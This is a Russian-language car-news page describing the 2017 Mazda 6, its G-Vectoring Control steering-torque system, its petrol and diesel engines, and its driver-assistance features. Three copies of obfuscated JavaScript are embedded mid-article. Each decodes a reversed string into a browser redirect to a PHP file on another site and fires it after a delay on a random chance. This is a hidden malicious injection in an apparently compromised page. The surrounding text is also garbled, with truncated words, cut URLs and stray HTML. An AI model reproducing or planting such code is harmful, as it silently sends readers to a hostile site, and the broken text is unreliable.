Новости

Mazda 6 2017 — вектора тяги колёс управляются рулевым управлением

Модель Mazda 6 2017 года, в комплектации седан и универсал начала продажи в Европе этой осенью.

Новая модель Mazda 6 2017 имеет множество премиальных улучшений и продолжает подтверждать понятие о том, что водитель должен испытывать удовольствие от вождения.

toring Control (GVC). С помощью этой системы она поднимает планку безопасности и легкости управления.

GVC является первым в серии новых технологий SKYACTIV-VEHICLE DYNAMICS (управление поперечными и продольными векторами тяги рулевым управлением), которые обеспечивают интегрированное управление двигателем, трансмиссией и шасси.

Autoteka

Связи между автомобилем и водителем с такой системой, по ощущениям, максимальна, что выгодно отличает автомобили Mazda 6 от других.

Основываясь на революционной идее повышения производительности шасси с двигателем, система GVC — первая в мире технология, регулирующая крутящий момент командой от рулевого управления.

Mazda 6 2017 комплектуется тремя бензиновыми двигателями: SKYACTIV – 145 л.с.; SKYACTIV G 2.0 — 165 л.с.; SKYACTIV G 2.5 — 192 л.с.

И двумя дизельными двигателями SKYACTIV-D 2.2 — 150 и 175 л.с. в версиях с автоматической или ручной коробкой передач.

$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/wp-content/uploads/2017/12/mazda-6-2017-3.jpg»>$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/wp-content/uploads/2017/12/mazda-6-2017-2.jpg»>$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/sistemy-passivnoj-bezopasnosti.html» target=»_blank» rel=»noopener»>пассивный уровень безопасности и обладает полным спектром tomobilya.html» target=»_blank» rel=»noopener»>активных технологий безопасности i-ACTIVSENSE. К ним относятся, в первую очередь, новая функция распознавания дорожного знака (TSR), которая идентифицирует знаки «Проезда нет» и «Ограничения скорости», предупреждая водителя о превышении скорости.

Также имеет систему поддержки расширенного интеллектуального торможения (Advanced SCBS), которая при помощи лазерного датчика с инфракрасным излучением и камерой обнаруживает транспортные средства, определяет расстояние до них и корректирует диапазоне скорости подтормаживанием.

Статьи по теме

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Back to top button